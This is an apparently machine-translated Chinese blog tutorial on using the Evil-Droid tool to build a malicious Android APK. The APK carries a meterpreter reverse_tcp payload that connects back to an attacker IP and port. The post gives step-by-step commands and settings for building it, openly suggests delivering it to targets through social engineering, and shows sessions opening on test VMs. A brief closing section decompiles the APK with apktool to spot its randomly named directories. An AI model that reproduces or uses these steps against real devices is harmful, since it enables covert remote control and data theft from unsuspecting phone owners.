在2分钟内生成ANDROID应用程序并破解任何ANDROID移动设备

  • A+
所属分类:安全技术

Android是一个开源平台,任何个人开发人员都可以将想法实现到Android应用程序中。 对于Android开发人员以及可以根据他们的需求使用大量应用程序的用户来说,这是一个很大的优势。 Android确实提供了许多功能,但也最容易受到攻击。 Android确实有很多漏洞,攻击者有利于窃取目标凭据。 根据CVE(Common Vulnerability Exposures),android有很多漏洞可以用来绕过android安全。

CVE显示了许多漏洞,这些漏洞主要由攻击者使用。 今天我们将展示一个名为Evil Droid的工具,用于创建不同的有效负载以危害Android设备。 国际网络安全研究所的道德黑客研究员表示,这个Evil-droid可用于生成恶意apk以穿透Android设备。

  • Evil-Droid已经安装在Kali Linux 2018.4 amd64上。
  • 对于克隆类型git clone https://github.com/M4sc3r4n0/Evil-Droid.git
  • 键入cd Evil-Droid
  • 输入chmod u + x evil-droid
  • 输入./evil-droid

====================== SNIP ========================

  • 输入1
  • 启动APK MSF
  • 键入本地IP地址(攻击者的IP地址)类型192.168.1.5
  • 键入端口号以侦听类型4444
  • 输入恶意apk名称。 输入testapk
  • 选择android / meterpreter / reverse_tcp
  • 选择多处理程序
  • 然后单击“ 确定”
  • Evil-droid创建了恶意应用程序。 现在,您可以通过社交工程将应用程序发送到目标。
  • 为了测试,我们使用了Android 4.4 iso。 从以下网址下载Android 4.4: https//sourceforge.net/projects/android-x86/files/latest/download
  • 我们已经在Vmware工作站中启动了实时启动
  • 将恶意测试apk安装到android 4.4中
  • 在安装之前,它会要求接受未知来源。 打开“未知来源”,然后安装test.apk
  • 因为test.apk在android中打开。
  • 将在Evil-droid监听器中创建会话。 另一个终端将自动打开以创建和运行会话。
  • Evil-droid meterpreter提供与metasploit meterpreter相同的命令。 你可以轻易地操纵你的目标。
  • 对于另一项测试,我们使用了Android 7.1 iso。
    从以下网址下载Android 7.1: https//osdn.net/projects/android-x86/downloads/67834/android-x86_64-7.1-r2.iso/
  • 我们已经在Vmware工作站中启动了实时启动
  • 将恶意测试apk安装到android 7.1中
  • 在安装之前,它会要求接受未知来源。 打开“未知来源”,然后安装test.apk。
  • 因为test.apk在android中打开。
  • 将在Evil-droid监听器中创建会话。
  • 另一个终端将自动打开以创建和运行会话。
  • Evil-droid meterpreter提供与metasploit meterpreter相同的命令。 你可以轻易地操纵你的目标。

使用FATRAT可以完成对Android设备的相同利用,了解它是如何工作的, 使用fatrat一步一步的教程破解windows android mac

扭转由Evil-Droid生成的Mailcious Apk: -

对于任何Android应用程序的逆向工程,有各种工具用于反编译APK。 但最流行的反编译器称为apktool ,用于反编译Android应用程序。 我们使用了预装在Kali Linux 2018.4 (amd64)中的apktool。

  • 打开另一个终端类型apktool -h
  root @kali:/ home / iicybersecurity / Downloads / Evil-Droid / evil / smali / com / jpzqkxcarh / zsehpukvxy# apktool -h 
 无法识别的选项:-h 
  Apktool v2.2.2  - 重新设计Android apk文件的工具 
 与smali v2.1.3和baksmali v2.1.3 
 版权所有2014RyszardWiśniewskibrut.alll@gmail.com 
 由Connor Tumbleson connor.tumbleson@gmail.com更新 
 用法:apktool 
  -advance, - 高级打印预先信息。 
  -version, - 版本打印版本然后退出 
 用法:apktool如果| install-framework [options] 
  -p, - 帧路径 
 将框架文件存储到。 
  -t, - 标记Tag框架使用。 
 用法:apktool d [ecode] [选项] 
  -f, - 强制删除目标目录。
  • 输入apktool d evil.apk
  root @ kali:/ home / iicybersecurity / Downloads / Evil-Droid# apktool d evil.apk 
 我:在evil.apk上使用Apktool 2.2.2 
 我:加载资源表... 
  I:使用资源解码AndroidManifest.xml ... 
  I:从文件加载资源表: 
 我:定期清单包... 
 我:解码文件资源...... 
  I:解码值/ XML ... 
 我:Baksmaling classes.dex ... 
 我:复制资产和库... 
 我:复制未知文件...... 
 我:复制原始文件... / root / .local / share / apktool / framework / 1.apk
  • 执行上述查询后,apktool已将恶意apk提取到一组XML中。 这些XML用于取证。
  • 当我们进一步分析时,我们发现恶意apk创建了具有混乱/随机字母名称的目录。 如果扫描任何普通应用程序,它将不会创建任何具有此类名称的随机目录。 此行为表明存在恶意apk。
  root @kali:/ home / iicybersecurity / Downloads / Evil-Droid #cd / evil / smali / com 
  root @ kali:/ home / iicybersecurity / Downloads / Evil-Droid / evil / smali / com# ls 
  jpzqkxcarh

2019年3月4日

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: